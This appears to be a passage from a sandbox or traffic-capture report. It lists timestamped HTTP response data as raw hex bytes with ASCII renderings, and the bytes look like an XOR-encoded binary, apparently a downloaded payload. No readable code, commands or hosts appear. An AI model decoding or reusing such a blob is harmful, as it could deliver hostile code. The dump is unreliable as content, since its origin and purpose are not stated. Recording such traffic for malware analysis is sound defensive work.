                                2022-06-26 07:43:09 UTC381INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:43:09 UTC382INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
                                2022-06-26 07:43:09 UTC384INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:43:09 UTC385INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB
                                2022-06-26 07:43:09 UTC389INData Raw: 25 68 20 21 0d c2 34 da da 9e c4 94 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 37 c8 65 25 89 da 55 89 64 45 68 20 21 0d d3 53 25 25 66 9e 66 30 21 0d e9 63 25 25 0e e5 7f 34 34 89 64 35 8d f4 c8 65 25 68 20 21 0d f2 2e da da 9e c4 48 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 83 c8 65 25 89 da 55 89 64 45 68 20 21 0d 3f 61 25 25 66 9e 66 30 21 0d 2d 1a 25 25 0e e5 7f 34 34 89 64 35 8d 40 c8 65 25 68 20 21 0d f6 48 da da 9e c4 fc 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d cf c8 65 25 89 da 55 89 64 45 68 20 21 0d 27 16 25 25 66 9e 66 30 21 0d b5 63 25 25 0e e5 7f 34 34 89 64 35 8d 8c c8 65 25 68 20 21 0d aa 91 da da 9e c4 b0 26 da da c6 15 36 34 38 9e 68 65 25 2e 7b 32
                                Data Ascii: %h !4q648he%0f%.f07e%UdEh !S%%ff0!c%%44d5e%h !.Hq648he%0f%.f0e%UdEh !?a%%ff0!-%%44d5@e%h !Hq648he%0f%.f0e%UdEh !'%%ff0!c%%44d5e%h !&648he%.{2
                                2022-06-26 07:43:09 UTC393INData Raw: da 57 89 64 47 66 20 21 8b 66 25 ea 92 f5 5e 1f 39 ea 62 a6 dc 25 25 da 49 70 3a d8 65 25 8e d8 65 25 eb d8 65 25 ca d8 65 25 27 23 65 25 39 23 65 25 4f 23 65 25 65 23 65 25 81 23 65 25 97 23 65 25 35 da 65 25 fe da 65 25 60 23 65 25 1f 23 65 25 35 da 65 25 fe da 65 25 fe da 65 25 bd 23 65 25 86 23 65 25 9a 23 65 25 ae 23 65 25 0b 23 65 25 a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 8d de 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 39 25 8b dd dc 25 0d 01 07 da da a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 1a de 25 25 66 20 21 ea 9a 65 2d 74 64 20 15 64 30 19 c4 51 de 25 25 66 20 21 66 65 2d 74 64 20 15 64 30 19 c4 3f de 25 25 66 20 21 b4 65 2d 0d a0 0a da da 64 20 15 64 30 19 c4 29 de 25 25 66 20 21 b8 65 2d 0d 8a 0a da da 64 20 15 64 30 19 c4 13 27 25 25
                                Data Ascii: WdGf !f%^9b%%Ip:e%e%e%e%'#e%9#e%O#e%e#e%#e%#e%5e%e%`#e%#e%5e%e%e%#e%#e%#e%#e%#e% %%%% %%%%%%E%%9%% %%%% %%%%%%f !e-td d0Q%%f !fe-td d0?%%f !e-d d0)%%f !e-d d0'%%
                                2022-06-26 07:43:09 UTC397INData Raw: 1c 25 c8 31 1c 25 c8 31 1c 25 c8 31 1c 25 b3 31 1c 25 c9 31 1c 25 92 31 1c 25 ef 31 1c 25 bc 31 1c 25 0e e5 64 20 1d c4 de dc 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 29 25 8b dd dc 25 0d 9b f9 da da 0e e5 64 20 1d c4 be 25 25 25 66 20 21 ba 65 2d b4 38 1d 76 c4 f9 25 25 25 66 20 21 b6 65 2d b4 38 1d 76 c4 a0 25 25 25 66 20 21 66 65 2d 64 20 1d c4 92 25 25 25 66 20 21 ea 9a 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 7c 25 25 25 66 20 21 ea e3 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 66 25 25 25 66 20 21 ea db 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 9d 66 20 21 ea 92 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 40 66 20 21 66 65 2d 64 20 11 0e e5 64 20 15 ba 48 11 b4 38 1d 76 c6 73 66 20 21 ba 8d 2d b4 38 1d 76 c6 67 0e e5 30 8d ec e8 1c 25 89 da 55 89 64 45 66 20 21 0d
                                Data Ascii: %1%1%1%1%1%1%1%1%d %%E%%)%%d %%%f !e-8v%%%f !e-8v%%%f !fe-d %%%f !e-d 8v|%%%f !e-d 8vf%%%f !e-d 8vf !e-d 8v@f !fe-d d H8vsf !-8vg0%UdEf !
                                2022-06-26 07:43:09 UTC401INData Raw: 3c da da 66 30 1d 66 eb 0d 0f fe da da c4 c2 de 25 25 b4 1e 2d 5e e9 19 b6 61 49 76 68 20 19 0d 16 50 da da 66 30 19 66 eb 0d a4 fe da da c4 eb de 25 25 b8 1e 2d 5e e9 19 b6 61 49 76 68 20 15 0d 3f 50 da da 66 30 15 66 eb 0d cd fe da da c4 80 de 25 25 da 4e 31 da 4e 2d 68 20 11 0d ac d6 da da 66 30 11 66 eb 0d 9a 00 da da c4 ad de 25 25 da 4e 31 da 4e 2d 68 20 0d 0d 11 d6 da da 66 30 0d 66 eb 0d c7 00 da da c4 46 de 25 25 68 20 09 75 66 1e 2d 94 da da da 5a df dc 25 25 25 0d 5a 06 da da 66 30 09 66 eb 0d 58 00 da da c4 6b de 25 25 68 30 05 8b 66 1e 2d 0d 09 d6 da da 66 30 05 66 eb 0d 87 00 da da c4 06 de 25 25 68 30 01 ea e3 1e 2d 0d 64 85 da da 66 30 01 66 eb 0d ee fe da da c4 35 de 25 25 68 30 fd 0e e5 af 1e 2d 0d 48 85 da da 66 30 fd 66 eb 0d d2 47 da
                                Data Ascii: <f0f%%-^aIvh Pf0f%%-^aIvh ?Pf0f%%N1N-h f0f%%N1N-h f0fF%%h uf-Z%%%Zf0fXk%%h0f-f0f%%h0-df0f5%%h0-Hf0fG
                                2022-06-26 07:43:09 UTC405INData Raw: 25 25 1e 50 97 97 40 93 3e 54 25 25 25 25 da da da da 29 25 25 25 69 3c 99 40 25 25 25 25 da da da da 2b 25 25 25 2a 91 40 2e 99 97 25 25 da da da da 2d 25 25 25 69 44 4e 95 3c 99 3e 8d 25 25 25 25 da da da da e0 25 25 25 20 97 97 4a 97 25 25 25 da da da da e2 25 25 25 67 4a 4a 91 40 3c 93 25 da da da da e2 25 25 25 7b 3c 97 44 3c 93 99 25 da da da da e2 25 25 25 30 93 46 93 4a 52 93 25 da da da da e2 25 25 25 69 40 3e 44 48 3c 91 25 da da da da de 25 25 25 49 55 6b 25 da da da da 2d 25 25 25 2e 8d 4a 97 99 24 93 99 25 25 25 25 da da da da 29 25 25 25 67 54 99 40 25 25 25 25 da da da da 29 25 25 25 32 4a 97 89 25 25 25 25 da da da da 2d 25 25 25 71 4a 93 42 32 4a 97 89 25 25 25 25 da da da da e0 25 25 25 24 93 99 5b 59 25 25 25 30 66 11 5c e9 1d d8 da da
                                Data Ascii: %%P@>T%%%%)%%%i<@%%%%+%%%*@.%%-%%%iDN<>%%%%%%% J%%%%%%gJJ@<%%%%{<D<%%%%0FJR%%%%i@>DH<%%%%IUk%-%%%.J$%%%%)%%%gT@%%%%)%%%2J%%%%-%%%qJB2J%%%%%%%$[Y%%%0f\
                                2022-06-26 07:43:09 UTC409INData Raw: 99 2d 68 30 d1 0d fe de 25 25 66 38 15 60 b6 99 41 26 68 d9 b8 d1 d8 da da 66 a3 29 60 da 99 e4 66 b2 66 2b 0d 0d 35 da da 60 b6 50 09 0e e5 7f 34 34 89 64 35 8d 0f 18 1c 25 66 38 15 60 b6 99 37 26 66 a9 b8 d1 d8 da da 75 0d fb 1b da da 60 b6 50 13 9e c4 c1 d6 23 da c6 ba 0e e5 7f 34 34 89 64 35 8d e8 63 1c 25 68 20 d1 66 f0 95 59 1c 25 0d f6 31 da da 9e c4 54 d6 23 da c6 0f 3a 83 36 66 c0 38 e7 2d 25 66 e5 30 66 11 5e e9 1d 66 20 2d 66 65 21 64 20 1d eb 20 21 2b 68 20 1d 75 8f 25 66 e8 e5 aa 1c 25 d7 dc 7c 85 10 1c 25 0d 44 9b da da 0d 99 d6 23 da 34 34 38 9e 30 66 11 5e e9 05 2e 7b 32 64 28 19 64 30 21 64 20 09 68 58 05 66 20 21 64 e2 0e 1b 64 40 1d 66 20 19 65 9c 05 27 04 e9 68 20 15 64 45 66 e2 0d ad 6b da da 66 fd 8f 25 8f 25 2e 66 e2 75 8f 25 8f 25
                                Data Ascii: -h0%%f8`A&hf)`ff+5`P44d5%f8`7&fu`P#44d5c%h fY%1T#:6f8-%f0f^f -fe!d !+h u%f%|%D#4480f^.{2d(d0!d hXf !dd@f e'h dEfkf%%.fu%%
                                2022-06-26 07:43:09 UTC413INData Raw: 50 95 4e b5 30 66 11 2c 2e 7b 32 a9 f7 99 2d 5e e9 15 0d a0 0d 23 da 66 d4 ad 30 da 66 fd 0e f7 66 9e 0d 0c 0b 23 da d7 dc 7c 59 6d 1c 25 0d 00 0b 23 da 64 1e 29 d7 dc 7c 19 6f 1c 25 0d 3b 0b 23 da 64 1e 2d d7 dc 7c 59 6d 1c 25 0d e2 0b 23 da 66 15 64 4e 31 66 eb 66 b2 0d a4 27 25 25 66 9e a5 58 da 25 99 ea 0d ed 0d 23 da 89 6a e0 25 25 25 25 5e e9 31 66 9e 3a 83 36 34 38 9e 66 e5 2e 7b 0d 98 0d 23 da 66 ff 66 15 66 ae a5 07 21 66 eb 0d bc c0 23 da 66 6b 29 0d c4 c0 23 da 66 6b 2d 0d bc c0 23 da 66 6b 31 0d b4 c0 23 da a9 b6 a3 e2 66 eb 0d 97 0d 23 da 83 36 9e 68 65 25 2e 7b 66 ff 66 15 60 b6 99 35 66 eb 0d 86 29 da da 16 fd 99 e0 0e e5 83 36 9e d5 dc 83 36 9e b5 2e 7b 32 66 1f 66 15 66 6b 31 66 7d 2d 26 5e d6 25 a1 00 66 ae 66 6b 31 0d 46 de 25 25 66 b2
                                Data Ascii: PN0f,.{2-^#f0ff#|Ym%#d)|o%;#d-|Ym%#fdN1ff'%%fX%#j%%%%^1f:648f.{#fff!f#fk)#fk-#fk1#f#6he%.{ff`5f)66.{2fffk1f}-&^%ffk1F%%f
                                2022-06-26 07:43:09 UTC418INData Raw: 35 8d 8a 83 1c 25 66 20 21 0d d0 b0 23 da 9e c4 b2 ff 23 da c6 15 83 34 38 9e b5 30 66 11 5e e9 1d 2e 7b 0e a4 64 28 1d 66 ff 64 20 21 0e e5 30 8d 2c 3a 1c 25 89 da 55 89 64 45 66 20 21 0d 61 d4 da da 0e e5 30 8d 59 3a 1c 25 89 da 55 89 64 45 66 9e 66 35 da 37 66 15 66 9e 0d 2a e6 25 25 06 15 68 20 1d 66 f3 0e f7 0d ec 07 23 da 66 30 1d 66 f3 66 9e 66 3d da 2e 31 66 30 1d 66 20 21 66 2d da 2c 51 0e e5 7f 34 34 89 64 35 8d 16 3a 1c 25 66 20 21 0d 7c d4 da da 9e c4 26 ff 23 da c6 15 0e e5 7f 34 34 89 64 35 8d 7d 3a 1c 25 68 20 1d 0d fd 05 23 da 9e c4 53 ff 23 da c6 15 83 36 34 34 38 9e 66 e5 30 66 11 5e e9 1d 2e 7b 32 0e b6 64 38 1d 66 cc 66 ff 64 20 21 0e e5 30 8d dc 85 1c 25 89 da 55 89 64 45 16 ce 99 89 66 20 21 0d 64 1d da da 0e e5 30 8d 09 3a 1c 25 89
                                Data Ascii: 5%f !##480f^.{d(fd !0,:%UdEf !a0Y:%UdEff57ff*%%h f#f0fff=.1f0f !f-,Q44d5:%f !|&#44d5}:%h #S#6448f0f^.{2d8ffd !0%UdEf !d0:%
                                2022-06-26 07:43:09 UTC422INData Raw: 30 1d 64 20 21 5e 18 b1 0d 1c 25 25 ea a9 ab 25 25 25 7c b1 0d 1c 25 0d 4b c0 da da 66 1d 0e e5 30 8d 8a 4a 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 69 66 ae 66 a2 0d 45 be da da 66 15 5e 58 21 25 99 2d 66 6b 2d 16 20 21 50 00 5e 58 1d 25 99 ea 66 7b 35 66 20 1d 0d fe e8 da da a9 e5 99 35 66 ae 66 a2 0d 23 bc da da 66 eb 0d e6 a0 23 da 26 5e d6 da 50 e1 0e e5 7f 34 34 89 64 35 8d db 4a 1c 25 7c b1 0d 1c 25 0d eb 09 da da 9e c4 f5 a4 23 da c6 13 3a 83 36 34 34 38 9e 68 65 25 30 66 11 2c 2e 7b 32 64 20 21 5e 18 b1 0d 1c 25 25 99 46 7c b1 0d 1c 25 0d 5e 09 da da 66 1d 0e e5 30 8d 12 95 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 04 66 ae 66 a2 0d 58 07 da da 66 15 66 6b 29 16 20 21 50 35 66 ae 66 a2 0d 9b bc da da 66 eb 0d 5e e9 23 da 26 5e d6 da
                                Data Ascii: 0d !^%%%%%|%Kf0J%UdEf:-&^%iffEf^X!%-fk- !P^X%f{5f 5ff#f#&^P44d5J%|%#:6448he%0f,.{2d !^%%F|%^f0%UdEf:-&^%ffXffk) !P5fff^#&^
                                2022-06-26 07:43:09 UTC426INData Raw: c6 c6 66 20 21 83 36 66 c0 38 9e 66 e5 2e 7b 32 5e e9 1d 66 cc 66 1f 66 fd 8f 65 8d 25 55 25 25 7b 8f 25 2e 0d 79 c0 23 da 64 29 49 68 69 49 29 75 7b 32 66 69 49 31 75 2e 0d 5a c0 23 da 66 29 49 34 7f 3a 83 36 9e 66 e5 30 66 11 5e e9 15 2e 7b 32 66 d4 66 17 66 fd 66 28 31 66 b2 66 9e 0d 84 da da da 64 20 1d 66 eb 0d b2 23 da da 66 ed 66 fb 66 9e 0d b9 da da da 64 20 21 68 20 15 75 8f 25 66 20 1d 75 66 20 21 75 8f 25 8f 25 2e 0d 2c be 23 da 66 15 a5 58 2d 25 99 f6 8f da 7b 0d dc c0 23 da 68 20 19 75 66 20 31 75 32 66 20 1d 75 2e 0d a3 09 23 da 66 eb 3a 83 36 66 c0 38 e7 2d 25 68 65 25 2e 7b 32 30 5c e9 f5 23 da da 66 0f 66 1d 0e b6 8f 65 8d 25 35 25 25 8d fe dc 25 25 8f 25 32 0d b9 09 23 da 64 29 49 5e 61 49 25 ea a9 84 25 25 25 66 29 49 eb 69 49 31 8d 68
                                Data Ascii: f !6f8f.{2^fffe%U%%{%.y#d)IhiI)u{2fiI1u.Z#f)I4:6f0f^.{2ffff(1ffd f#fffd !h u%f uf !u%%.,#fX-%{#h uf 1u2f u.#f:6f8-%he%.{20\#ffe%5%%%%%2#d)I^aI%%%%f)IiI1h
                                2022-06-26 07:43:09 UTC429INData Raw: e9 19 2e 7b 32 0e b6 64 38 19 66 d4 64 30 1d 64 20 21 66 20 21 0d e3 dd 23 da 66 20 1d 0d db dd 23 da 0e e5 30 8d a8 b1 1c 25 89 da 55 89 64 45 0e 1b 68 20 19 66 30 21 0d 5e d9 23 da 66 20 19 0d 7e db 23 da 75 66 a2 94 dc 25 25 25 66 f0 d5 ad 1c 25 0d e1 eb 23 da 5e e9 29 66 30 19 66 20 1d 0d 8f 94 23 da 66 fd 26 5e d6 da 50 ea 66 e2 68 29 d5 66 30 19 0d dc d9 23 da c6 10 66 e2 68 29 d5 75 66 a6 df dc 25 25 25 66 20 19 0d db dd 23 da 66 20 1d 0d 73 db 23 da 66 ed de a6 68 20 19 df dc 25 25 25 0d b8 dd 23 da 6b 5e 58 19 25 50 84 0e e5 7f 34 34 89 64 35 8d f9 b1 1c 25 68 20 19 df de 25 25 25 0d a5 8e 23 da 9e c4 d7 d1 23 da c6 c6 3a 83 36 66 c0 38 9e b5 2e 7b 32 30 2c 66 c4 66 ff 64 29 49 68 4e dc 66 fb 66 a0 0d 49 94 23 da 73 60 1b a1 f6 6b 0e da 66 41 49
                                Data Ascii: .{2d8fd0d !f !#f #0%UdEh f0!^#f ~#uf%%%f%#^)f0f #f&^Pfh)f0#fh)uf%%%f #f s#fh %%%#k^X%P44d5%h %%%##:6f8.{20,ffd)IhNffI#s`kfAI
                                2022-06-26 07:43:09 UTC433INData Raw: 25 df f1 d7 1c 25 0d 11 7e 23 da da 10 59 c4 1c 25 da 10 41 c4 1c 25 da 10 25 c4 1c 25 8d 05 d7 1c 25 68 60 99 da da da df 29 25 25 25 0d cc cb 23 da 66 60 99 da da da 0d 4b cd 23 da 75 0d 05 a2 23 da 7e ed 0d 1c 25 da 10 71 c4 1c 25 8d 11 d7 1c 25 da 10 5d c4 1c 25 8d 21 d7 1c 25 da 10 f5 0d 1c 25 68 60 95 da da da df e0 25 25 25 0d 8a cb 23 da 66 60 95 da da da 0d 09 82 23 da 75 7c ed 0d 1c 25 75 0d 7d a2 23 da 7e dd 0d 1c 25 df 6d 3e 65 25 dd dd 0d 1c 25 0d f9 11 da da 7c ed 0d 1c 25 75 0d 9c eb 23 da dd 59 c4 1c 25 df 31 8e 1c 25 0d 63 7e 23 da dd 41 c4 1c 25 df 3d 8e 1c 25 0d 0a 7e 23 da dd 25 c4 1c 25 df 49 8e 1c 25 0d 45 7e 23 da dd 5d c4 1c 25 df 55 8e 1c 25 0d ec 7e 23 da dd 71 c4 1c 25 df 65 8e 1c 25 0d 27 7e 23 da dd f5 0d 1c 25 df 71 8e 1c 25
                                Data Ascii: %%~#Y%A%%%%h`)%%%#f`K#u#~%q%%]%!%%h`%%%#f`#u|%u}#~%m>e%%|%u#Y%1%c~#A%=%~#%%I%E~#]%U%~#q%e%'~#%q%
                                2022-06-26 07:43:09 UTC437INData Raw: 1c 25 7c ed 0d 1c 25 75 0d 2c 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d a8 01 da da 8d e5 db 1c 25 7c ed 0d 1c 25 75 0d 08 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 84 01 da da 7c ed 0d 1c 25 75 0d bb db 23 da dd 59 c4 1c 25 df 09 db 1c 25 0d ee 6e 23 da 68 60 99 d8 da da 94 f9 8e 1c 25 66 f0 59 c4 1c 25 0d 90 70 23 da 66 60 99 d8 da da 0d 83 72 23 da 66 f5 68 60 9d d8 da da 0d 64 b9 23 da 66 60 9d d8 da da df 25 a5 25 25 0d cc 43 da da 7e ed 0d 1c 25 8d 0d db 1c 25 7c ed 0d 1c 25 75 0d d1 db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 4d 01 da da 8d 21 db 1c 25 7c ed 0d 1c 25 75 0d ad db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 29 01 da da 8d 31 92 1c 25 7c ed 0d 1c 25 75 0d 89 db 23 da 7e dd 0d 1c 25
                                Data Ascii: %|%u,#~%M>e%%%|%u#~%M>e%%|%u#Y%%n#h`%fY%p#f`r#fh`d#f`%%%C~%%|%u#~%M>e%%M!%|%u#~%M>e%%)1%|%u#~%
                                2022-06-26 07:43:09 UTC441INData Raw: 1c 25 a9 25 a9 25 25 25 a5 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 25 39 25 39 25 39 25 39 dc a9 67 a9 dc 2b 67 2b 25 41 25 41 25 25 25 39 e2 a5 22 a5 e2 27 22 27 25 25 25 25 25 25 25 25 25 25 25 25 2d 25 2d 25 25 25 25 25 25 25 25 25 25 25 25 25 35 1c c5 dc 3d dc 45 dc 09 45 09 45 da da 25 25 25 25 25 25 25 25 25 25 da da da da da da 35 dc 25 25 08 e0 1a 25 1a 27 1a 25 1a 27 1a 25 1a 25 1a 25 1a 27 35 dc da da da da da da da da da da da da da da fe 65 fe 65 fe 27 fe 27 da da da da da da da da 1a 25 1a 27 0a 25 1a 27 18 25 18 25 1a 25 1a 25 25 25 25 a5 25 a5 25 a5 25 25 25 25 da da da da da da da da da da da da da da da da da da da da 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 02 67 1a 25 1a 25
                                Data Ascii: %%%%%-%-%-%-%-%-%-%-%%9%9%9%9g+g+%A%A%%%9"'"'%%%%%%%%%%%%-%-%%%%%%%%%%%%%5=EEE%%%%%%%%%%5%%%'%'%%%'5ee''%'%'%%%%%%%%%%%%%EEEEEEEEEEEEEEEEg%%
                                2022-06-26 07:43:09 UTC445INData Raw: 25 25 71 4a 3e 3c 91 1c 91 91 4a 3e 25 25 25 25 22 40 99 79 44 3e 46 1e 4a 50 93 99 25 25 25 25 2c 50 40 97 54 75 40 97 8b 4a 97 48 3c 93 3e 40 1e 4a 50 93 99 40 97 25 25 25 22 40 99 7b 40 97 4e 44 4a 93 25 25 25 25 22 40 99 1e 50 97 97 40 93 99 79 8d 97 40 3c 89 24 89 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 69 40 3e 97 40 48 40 93 99 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 24 93 3e 97 40 48 40 93 99 25 25 25 25 7b 44 97 99 50 3c 91 2c 50 40 97 54 25 25 25 25 32 44 89 40 1e 8d 3c 97 79 4a 28 50 91 99 44 67 54 99 40 25 25 25 28 50 91 99 44 67 54 99 40 79 4a 32 44 89 40 1e 8d 3c 97 25 25 25 91 4e 99 97 91 40 93 1c 25 25 25 25 91 4e 99 97 3e 95 54 93 1c 25 25 25 71 4a 3c 89 71 44 87 97 3c 97 54 20 9d 1c 25 25 25 25 22 40 99 79 8d 97 40 3c 89 71 4a
                                Data Ascii: %%qJ><J>%%%%"@yD>FJP%%%%,P@Tu@JH<>@JP@%%%"@{@NDJ%%%%"@P@y@<$%%%%$@J>F@i@>@H@%%%%$@J>F@$>@H@%%%%{DP<,P@T%%%%2D@<yJ(PDgT@%%%(PDgT@yJ2D@<%%%N@%%%%N>T%%%qJ<qD<T %%%%"@y@<qJ
                                2022-06-26 07:43:09 UTC450INData Raw: 59 f5 59 f9 59 fd 59 01 59 05 59 09 59 0d 59 11 59 21 59 41 10 49 10 4d 10 51 10 55 10 59 10 5d 10 61 10 65 10 69 10 7d 10 9d 10 a5 10 a9 10 ad 10 b1 10 b5 10 b9 10 bd 10 c1 10 c5 10 d9 10 f9 10 01 10 05 10 09 10 0d 10 11 10 15 10 19 10 1d 10 21 10 35 5b 55 5b 5d 5b 61 5b 65 5b 69 5b 6d 5b 71 5b 75 5b 79 5b 7d 5b 95 5b b5 5b bd 5b c1 5b c5 5b c9 5b cd 5b d1 5b d5 5b d9 5b dd 5b ed 5b 0d 5b 15 5b 19 5b 1d 5b 21 5b 25 12 29 12 2d 12 31 12 35 12 49 12 69 12 71 12 75 12 79 12 7d 12 81 12 85 12 89 12 8d 12 91 12 a1 12 c1 12 c9 12 cd 12 d1 12 d5 12 d9 12 dd 12 e1 12 e5 12 e9 12 fd 12 1d 12 25 5d 29 5d 2d 5d 31 5d 35 5d 39 5d 3d 5d 41 5d 45 5d 5d 5d 7d 5d 85 5d 89 5d 8d 5d 91 5d 95 5d 99 5d 9d 5d a1 5d a5 5d b9 5d d9 5d e1 5d e5 5d e9 5d ed 5d f1 5d f5 5d f9 5d
                                Data Ascii: YYYYYYYYY!YAIMQUY]aei}!5[U[][a[e[i[m[q[u[y[}[[[[[[[[[[[[[[[[[![%)-15Iiquy}%])]-]1]5]9]=]A]E]]]}]]]]]]]]]]]]]]]]]]]
